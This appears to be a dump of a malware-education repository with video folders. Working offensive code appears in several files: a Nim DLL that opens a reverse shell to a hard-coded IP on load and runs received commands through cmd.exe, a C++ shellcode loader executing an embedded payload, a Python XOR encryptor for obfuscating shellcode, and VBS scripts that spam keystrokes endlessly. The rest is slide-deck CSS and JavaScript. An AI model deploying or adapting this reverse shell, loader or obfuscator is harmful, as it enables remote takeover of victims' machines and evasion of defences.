https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/fun-with-dlls/shell.dll -------------------------------------------------------------------------------- /videos/fun-with-dlls/shell.nim: -------------------------------------------------------------------------------- 1 | # shell dll 2 | # created by : cosmo 3 | 4 | # imports 5 | import winim/lean 6 | import net, osproc, strformat 7 | 8 | proc NimMain() {.cdecl, importc.} 9 | 10 | proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} = 11 | NimMain() 12 | 13 | if fdwReason == DLL_PROCESS_ATTACH: 14 | 15 | # variables 16 | let 17 | ip = "192.168.1.180" 18 | port = 2583 19 | sock = newSocket() 20 | prompt = "Cosmo's Shell $ " 21 | 22 | # connection 23 | while true: 24 | try: 25 | sock.connect(ip, Port(port)) 26 | except: 27 | continue 28 | 29 | break 30 | 31 | # loop remote shell 32 | while true: 33 | send(sock, prompt) 34 | let args = recvLine(sock) 35 | 36 | # execute 37 | try: 38 | let cmd = execProcess(fmt"cmd.exe /c" & args) 39 | send(sock, cmd) 40 | 41 | # disconnect 42 | except: 43 | break 44 | 45 | return true -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation-cgpa.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation-cgpa.obj -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation-full.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation-full.obj -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation.exe -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/function-obfuscation.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/function-obfuscation.obj -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/notepad.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/notepad.bin -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/vc140.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/function-obfuscation/fob/vc140.pdb -------------------------------------------------------------------------------- /videos/function-obfuscation/fob/xor-encrypt.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # xor shellcode encryptor 3 | # created by : bluecosmo 4 | 5 | # imports 6 | import sys 7 | 8 | # constants 9 | ENCRYPTION_KEY = "cosmodiumcs" 10 | 11 | # encrypt shellcode using xor 12 | def encrypt_xor(input_data, encryption_key): 13 | encryption_key = str(encryption_key) 14 | output_string = "" 15 | 16 | # encryption process 17 | for i in range(len(input_data)): 18 | current_data_element = input_data[i] 19 | current_key = encryption_key[i % len(encryption_key)] 20 | output_string += chr(current_data_element ^ ord(current_key)) 21 | 22 | return output_string 23 | 24 | def print_ciphertext(ciphertext): 25 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 26 | 27 | try: 28 | plaintext = open(sys.argv[1], "rb").read() 29 | except Exception as e: 30 | print("Error: ", e) 31 | print("Usage: python file.py PAYLOAD") 32 | sys.exit(1) 33 | 34 | ciphertext = encrypt_xor(plaintext, ENCRYPTION_KEY) 35 | print_ciphertext(ciphertext) 36 | -------------------------------------------------------------------------------- /videos/function-obfuscation/function-obfuscation.cpp: -------------------------------------------------------------------------------- 1 | // function obfuscation in .data section 2 | // created by : bluecosmo 3 | 4 | // imports 5 | #include 6 | #include 7 | #include 8 | 9 | // shellcode payload 10 | unsigned char shellcode_payload[196] = { 11 | 0xFC, 0xE8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5, 0x31, 0xC0, 0x64, 12 | 0x8B, 0x50, 0x30, 0x8B, 0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 13 | 0x0F, 0xB7, 0x4A, 0x26, 0x31, 0xFF, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 14 | 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF2, 0x52, 0x57, 0x8B, 0x52, 15 | 0x10, 0x8B, 0x4A, 0x3C, 0x8B, 0x4C, 0x11, 0x78, 0xE3, 0x48, 0x01, 0xD1, 16 | 0x51, 0x8B, 0x59, 0x20, 0x01, 0xD3, 0x8B, 0x49, 0x18, 0xE3, 0x3A, 0x49, 17 | 0x8B, 0x34, 0x8B, 0x01, 0xD6, 0x31, 0xFF, 0xAC, 0xC1, 0xCF, 0x0D, 0x01, 18 | 0xC7, 0x38, 0xE0, 0x75, 0xF6, 0x03, 0x7D, 0xF8, 0x3B, 0x7D, 0x24, 0x75, 19 | 0xE4, 0x58, 0x8B, 0x58, 0x24, 0x01, 0xD3, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 20 | 0x58, 0x1C, 0x01, 0xD3, 0x8B, 0x04, 0x8B, 0x01, 0xD0, 0x89, 0x44, 0x24, 21 | 0x24, 0x5B, 0x5B, 0x61, 0x59, 0x5A, 0x51, 0xFF, 0xE0, 0x5F, 0x5F, 0x5A, 22 | 0x8B, 0x12, 0xEB, 0x8D, 0x5D, 0x6A, 0x01, 0x8D, 0x85, 0xB2, 0x00, 0x00, 23 | 0x00, 0x50, 0x68, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xE0, 0x1D, 24 | 0x2A, 0x0A, 0x68, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x3C, 0x06, 0x7C, 25 | 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 26 | 0x00, 0x53, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 27 | 0x65, 0x78, 0x65, 0x00 28 | }; 29 | 30 | // shellcode length 31 | unsigned int shellcode_length = sizeof(shellcode_payload); 32 | 33 | // virtual protect function 34 | BOOL VirtualProtect( 35 | LPVOID lpAddress, 36 | SIZE_T dwSize, 37 | DWORD flNewProtect, 38 | PDWORD lpflOldProtect 39 | ); 40 | 41 | // main code 42 | int main(VOID) { 43 | 44 | // allocate the memory 45 | LPVOID memory_address = VirtualAlloc(NULL, shellcode_length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 46 | 47 | // load shellcode into memory 48 | RtlMoveMemory(memory_address, shellcode_payload, shellcode_length); 49 | 50 | // make shellcode executable 51 | DWORD old_protection = 0; 52 | BOOL returned_vp = VirtualProtect(memory_address, shellcode_length, PAGE_EXECUTE_READ, & old_protection); 53 | 54 | // execute thread 55 | if (returned_vp != NULL) { 56 | HANDLE thread_handle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE) memory_address, NULL, NULL, NULL); 57 | 58 | // waite for thread to complete 59 | WaitForSingleObject(thread_handle, INFINITE); 60 | } 61 | } 62 | 63 | -------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/README.md: -------------------------------------------------------------------------------- 1 | - [video](https://youtu.be/YFRwv7XgUDY) 2 | -------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/injection-backspace.vbs: -------------------------------------------------------------------------------- 1 | Set wshShell=wscript.CreateObject("WScript.Shell") 2 | 3 | ' infinite loop 4 | do 5 | wshshell.sendkeys "{bs}" 6 | wscript.sleep 100 7 | loop 8 | 9 | ' for loop 10 | ' For count = 1 to 15 11 | ' key.sendkeys "{bs}" 12 | ' wscript.sleep 100 13 | ' Next 14 | -------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/injection-disco.vbs: -------------------------------------------------------------------------------- 1 | Dim count 2 | Set key = CreateObject("wscript.shell") 3 | 4 | ' infinite loop 5 | do 6 | key.sendkeys "{CAPSLOCK}" 7 | key.sendkeys "{NUMLOCK}" 8 | key.sendkeys "{SCROLLLOCK}" 9 | wscript.sleep 100 10 | loop 11 | 12 | ' for loop 13 | ' For count = 1 to 100 14 | ' key.sendkeys "{CAPSLOCK}" 15 | ' key.sendkeys "{NUMLOCK}" 16 | ' key.sendkeys "{SCROLLLOCK}" 17 | ' wscript.sleep 100 18 | ' Next -------------------------------------------------------------------------------- /videos/keystroke-injection-vbs/injection-string.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/keystroke-injection-vbs/injection-string.vbs -------------------------------------------------------------------------------- /videos/malware-roadmap/README.md: -------------------------------------------------------------------------------- 1 | - [video](https://youtu.be/RCutqPF5fLs) 2 | 3 | open `index.html` in browser for interactive slides, alternatively view `slides.pdf` 4 | -------------------------------------------------------------------------------- /videos/malware-roadmap/css/vs2015.css: -------------------------------------------------------------------------------- 1 | pre code.hljs{display:block;overflow-x:auto;padding:1em}code.hljs{padding:3px 5px}.hljs{background:#1e1e1e;color:#dcdcdc}.hljs-keyword,.hljs-literal,.hljs-name,.hljs-symbol{color:#569cd6}.hljs-link{color:#569cd6;text-decoration:underline}.hljs-built_in,.hljs-type{color:#4ec9b0}.hljs-class,.hljs-number{color:#b8d7a3}.hljs-meta .hljs-string,.hljs-string{color:#d69d85}.hljs-regexp,.hljs-template-tag{color:#9a5334}.hljs-formula,.hljs-function,.hljs-params,.hljs-subst,.hljs-title{color:#dcdcdc}.hljs-comment,.hljs-quote{color:#57a64a;font-style:italic}.hljs-doctag{color:#608b4e}.hljs-meta,.hljs-meta .hljs-keyword,.hljs-tag{color:#9b9b9b}.hljs-template-variable,.hljs-variable{color:#bd63c5}.hljs-attr,.hljs-attribute{color:#9cdcfe}.hljs-section{color:gold}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}.hljs-bullet,.hljs-selector-attr,.hljs-selector-class,.hljs-selector-id,.hljs-selector-pseudo,.hljs-selector-tag{color:#d7ba7d}.hljs-addition{background-color:#144212;display:inline-block;width:100%}.hljs-deletion{background-color:#600;display:inline-block;width:100%} -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/reset.css: -------------------------------------------------------------------------------- 1 | /* http://meyerweb.com/eric/tools/css/reset/ 2 | v4.0 | 20180602 3 | License: none (public domain) 4 | */ 5 | 6 | html, body, div, span, applet, object, iframe, 7 | h1, h2, h3, h4, h5, h6, p, blockquote, pre, 8 | a, abbr, acronym, address, big, cite, code, 9 | del, dfn, em, img, ins, kbd, q, s, samp, 10 | small, strike, strong, sub, sup, tt, var, 11 | b, u, i, center, 12 | dl, dt, dd, ol, ul, li, 13 | fieldset, form, label, legend, 14 | table, caption, tbody, tfoot, thead, tr, th, td, 15 | article, aside, canvas, details, embed, 16 | figure, figcaption, footer, header, hgroup, 17 | main, menu, nav, output, ruby, section, summary, 18 | time, mark, audio, video { 19 | margin: 0; 20 | padding: 0; 21 | border: 0; 22 | font-size: 100%; 23 | font: inherit; 24 | vertical-align: baseline; 25 | } 26 | /* HTML5 display-role reset for older browsers */ 27 | article, aside, details, figcaption, figure, 28 | footer, header, hgroup, main, menu, nav, section { 29 | display: block; 30 | } -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-italic.woff -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-regular.woff -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibold.woff -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.eot -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.ttf -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro-semibolditalic.woff -------------------------------------------------------------------------------- /videos/malware-roadmap/dist/theme/fonts/source-sans-pro/source-sans-pro.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: 'Source Sans Pro'; 3 | src: url('./source-sans-pro-regular.eot'); 4 | src: url('./source-sans-pro-regular.eot?#iefix') format('embedded-opentype'), 5 | url('./source-sans-pro-regular.woff') format('woff'), 6 | url('./source-sans-pro-regular.ttf') format('truetype'); 7 | font-weight: normal; 8 | font-style: normal; 9 | } 10 | 11 | @font-face { 12 | font-family: 'Source Sans Pro'; 13 | src: url('./source-sans-pro-italic.eot'); 14 | src: url('./source-sans-pro-italic.eot?#iefix') format('embedded-opentype'), 15 | url('./source-sans-pro-italic.woff') format('woff'), 16 | url('./source-sans-pro-italic.ttf') format('truetype'); 17 | font-weight: normal; 18 | font-style: italic; 19 | } 20 | 21 | @font-face { 22 | font-family: 'Source Sans Pro'; 23 | src: url('./source-sans-pro-semibold.eot'); 24 | src: url('./source-sans-pro-semibold.eot?#iefix') format('embedded-opentype'), 25 | url('./source-sans-pro-semibold.woff') format('woff'), 26 | url('./source-sans-pro-semibold.ttf') format('truetype'); 27 | font-weight: 600; 28 | font-style: normal; 29 | } 30 | 31 | @font-face { 32 | font-family: 'Source Sans Pro'; 33 | src: url('./source-sans-pro-semibolditalic.eot'); 34 | src: url('./source-sans-pro-semibolditalic.eot?#iefix') format('embedded-opentype'), 35 | url('./source-sans-pro-semibolditalic.woff') format('woff'), 36 | url('./source-sans-pro-semibolditalic.ttf') format('truetype'); 37 | font-weight: 600; 38 | font-style: italic; 39 | } 40 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/_style.css: -------------------------------------------------------------------------------- 1 | div.palette, div.boardhandle { 2 | position: absolute; 3 | /* 4 | height: 260px; 5 | margin: -130px 0 0 0px; 6 | */ 7 | top: 50%; 8 | transform: translateY(-50%); 9 | font-size: 24px; 10 | border-radius: 10px; 11 | border-top: 4px solid #222; 12 | border-right: 4px solid #222; 13 | border-bottom: 4px solid #222; 14 | background: black; 15 | transition: transform 0.3s; 16 | } 17 | 18 | div.palette { 19 | left: -10px; 20 | padding-left:10px; 21 | } 22 | 23 | div.boardhandle { 24 | right: -10px; 25 | padding-right:10px; 26 | } 27 | 28 | div.palette > ul, 29 | div.boardhandle > ul { 30 | list-style-type: none; 31 | margin: 0; 32 | padding: 0; 33 | } 34 | 35 | div.palette > ul > li, 36 | div.boardhandle > ul > li { 37 | margin: 10px; 38 | } 39 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/blackboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/blackboard.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-black.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-black.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-blue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-blue.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-green.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-orange.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-orange.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-purple.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-purple.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-red.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-red.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/boardmarker-yellow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/boardmarker-yellow.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-blue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-blue.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-green.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-green.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-orange.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-orange.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-purple.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-purple.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-red.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-red.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-white.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/chalk-yellow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/chalk-yellow.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/sponge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/sponge.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/img/whiteboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/plugin/chalkboard/img/whiteboard.png -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/chalkboard/style.css: -------------------------------------------------------------------------------- 1 | div.palette, div.boardhandle { 2 | position: absolute; 3 | /* 4 | height: 260px; 5 | margin: -130px 0 0 0px; 6 | */ 7 | top: 50%; 8 | transform: translateY(-50%); 9 | font-size: 24px; 10 | border-radius: 10px; 11 | border-top: 4px solid #222; 12 | border-right: 4px solid #222; 13 | border-bottom: 4px solid #222; 14 | background: black; 15 | transition: transform 0.3s; 16 | } 17 | 18 | div.palette { 19 | left: -10px; 20 | padding-left:10px; 21 | } 22 | 23 | div.boardhandle { 24 | right: -10px; 25 | padding-right:10px; 26 | } 27 | 28 | div.palette > ul, 29 | div.boardhandle > ul { 30 | list-style-type: none; 31 | margin: 0; 32 | padding: 0; 33 | } 34 | 35 | div.palette > ul > li, 36 | div.boardhandle > ul > li { 37 | margin: 10px; 38 | } 39 | 40 | @media print { 41 | div.palette, div.boardhandle, .chalkboard-button { 42 | display: none!important; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/customcontrols/README.md: -------------------------------------------------------------------------------- 1 | # Custom controls 2 | 3 | This plugin allows to add responsive custom controls to reveal.js which allow arbitrary positioning, layout, and behaviour of the controls. 4 | 5 | [Check out the live demo](https://rajgoel.github.io/reveal.js-demos/customcontrols-demo.html) 6 | 7 | 8 | ## Installation 9 | 10 | Copy the files `plugin.js` and `style.css` into the plugin folder of your reveal.js presentation, i.e. ```plugin/customcontrols``` and load the plugin as shown below. 11 | 12 | ```html 13 | 14 | 15 | 16 | 23 | ``` 24 | 25 | Note, without configuration you need to add 26 | 27 | ```javascript 28 | 29 | ``` 30 | 31 | between `````` and `````` of your HTML file because the defaults use [Font Awesome](http://fontawesome.io/). 32 | 33 | 34 | 35 | ## Configuration 36 | 37 | The plugin can be configured by adding custom controls and changing the layout of the slide number, e.g., by: 38 | 39 | 40 | ```javascript 41 | Reveal.initialize({ 42 | // ... 43 | customcontrols: { 44 | controls: [ 45 | { 46 | id: 'toggle-overview', 47 | title: 'Toggle overview (O)', 48 | icon: '', 49 | action: 'Reveal.toggleOverview();' 50 | }, 51 | { icon: '', 52 | title: 'Toggle chalkboard (B)', 53 | action: 'RevealChalkboard.toggleChalkboard();' 54 | }, 55 | { icon: '', 56 | title: 'Toggle notes canvas (C)', 57 | action: 'RevealChalkboard.toggleNotesCanvas();' 58 | } 59 | ] 60 | }, 61 | // ... 62 | 63 | }); 64 | ``` 65 | 66 | The `id` and `title` are optional. The configuration should be self explaining and any number of controls can be added. The style file can be altered to control the layout and responsiveness of the custom controls. 67 | 68 | ## License 69 | 70 | MIT licensed 71 | 72 | Copyright (C) 2020 Asvin Goel 73 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/customcontrols/plugin.js: -------------------------------------------------------------------------------- 1 | /***************************************************************** 2 | ** Author: Asvin Goel, goel@telematique.eu 3 | ** 4 | ** A plugin replacing the default controls by custom controls. 5 | ** 6 | ** Version: 2.0.0 7 | ** 8 | ** License: MIT license (see LICENSE.md) 9 | ** 10 | ******************************************************************/ 11 | window.RevealCustomControls = window.RevealCustomControls || { 12 | id: 'RevealCustomControls', 13 | init: function(deck) { 14 | initCustomControls(deck); 15 | } 16 | }; 17 | 18 | const initCustomControls = function(Reveal){ 19 | var config = Reveal.getConfig().customcontrols || {}; 20 | 21 | var collapseIcon = config.collapseIcon || ''; 22 | var expandIcon = config.expandIcon || ''; 23 | var tooltip = config.tooltip || 'Show/hide controls'; 24 | 25 | var div = document.createElement( 'div' ); 26 | div.id = 'customcontrols'; 27 | 28 | var toggleButton = document.createElement( 'button' ); 29 | toggleButton.title = tooltip; 30 | toggleButton.innerHTML = '' + collapseIcon + '' + '' + expandIcon + ''; 31 | 32 | toggleButton.addEventListener('click', function( event ) { 33 | var div = document.querySelector("div#customcontrols"); 34 | if ( div.classList.contains('collapsed') ) { 35 | div.classList.remove('collapsed'); 36 | } 37 | else { 38 | div.classList.add('collapsed'); 39 | } 40 | }); 41 | 42 | div.appendChild(toggleButton); 43 | 44 | var controls = document.createElement( 'ul' ); 45 | for (var i = 0; i < config.controls.length; i++ ) { 46 | var control = document.createElement( 'li' ); 47 | if ( config.controls[i].id ) { 48 | control.id = config.controls[i].id; 49 | } 50 | control.innerHTML = ''; 51 | controls.appendChild( control ); 52 | } 53 | div.appendChild( controls ); 54 | 55 | 56 | document.querySelector(".reveal").appendChild( div ); 57 | 58 | document.addEventListener( 'resize', function( event ) { 59 | // expand controls to make sure they are visible 60 | var div = document.querySelector("div#customcontrols.collapsed"); 61 | if ( div ) { 62 | div.classList.remove('collapsed'); 63 | } 64 | } ); 65 | 66 | return this; 67 | 68 | }; 69 | 70 | -------------------------------------------------------------------------------- /videos/malware-roadmap/plugin/customcontrols/style.css: -------------------------------------------------------------------------------- 1 | #customcontrols { 2 | z-index: 40; 3 | position: fixed; 4 | left: 70px; 5 | bottom: 30px; 6 | text-align: center; 7 | font-size: 24px; 8 | } 9 | 10 | #customcontrols button { 11 | background: none; 12 | color: var(--r-link-color); 13 | border: none; 14 | padding: 0; 15 | font: inherit; 16 | cursor: pointer; 17 | outline: inherit; 18 | z-index: 40; 19 | } 20 | 21 | #customcontrols button:hover { 22 | color: var(--r-link-color-hover); 23 | } 24 | 25 | #customcontrols > ul { 26 | position: fixed; 27 | left: 54px; 28 | bottom: 64px; 29 | list-style-type: none; 30 | overflow: hidden; 31 | margin: 0; 32 | padding: 0; 33 | border: 1px solid var(--r-link-color); 34 | border-radius: 5px; 35 | padding: 10px; 36 | background-color: var(--r-background-color) 37 | } 38 | 39 | #customcontrols ul > li { 40 | margin: 0px 5px; 41 | padding: 0px 5px; 42 | float: left; 43 | } 44 | 45 | #customcontrols.collapsed #collapse-customcontrols, #customcontrols.collapsed > ul { 46 | display: none; 47 | } 48 | 49 | #customcontrols:not(.collapsed) #expand-customcontrols { 50 | display: none; 51 | } 52 | 53 | @media only screen and (min-width: 500px) { 54 | 